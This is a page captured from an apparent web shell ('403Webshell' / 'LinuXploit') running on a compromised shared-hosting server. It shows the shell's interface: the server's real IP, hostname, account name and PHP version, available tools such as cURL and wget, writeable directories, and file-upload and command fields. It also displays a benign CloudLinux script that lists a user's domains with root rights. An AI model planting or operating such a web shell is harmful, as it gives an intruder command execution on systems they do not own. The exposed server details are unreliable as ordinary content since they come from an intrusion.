403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.149.235.108
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/bin/plesk_suid_caller.py
# coding: utf-8

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

from __future__ import print_function
from __future__ import absolute_import

import sys
import json
import traceback

from clcommon import ClPwd
from clcommon.cpapi.plugins.plesk import userdomains
from clcommon.cpapi.cpapiexceptions import NoPanelUser


try:
    uid = int(sys.argv[1])
    _clpwd = ClPwd()
    pwd_list = _clpwd.get_pw_by_uid(uid)
    for user_pwd in pwd_list:
        username = user_pwd.pw_name
        try:
            res = userdomains(username, as_root=True)
            print(json.dumps(res))
            sys.exit(0)
        except NoPanelUser:
            pass
    print(json.dumps({}))
    sys.exit(0)
except (NoPanelUser, KeyError):
    print(json.dumps({}))
    sys.exit(11)
except Exception:
    print(json.dumps(traceback.format_exc()))
    sys.exit(10)

Youez - 2016 - github.com/yon3zu
LinuXploit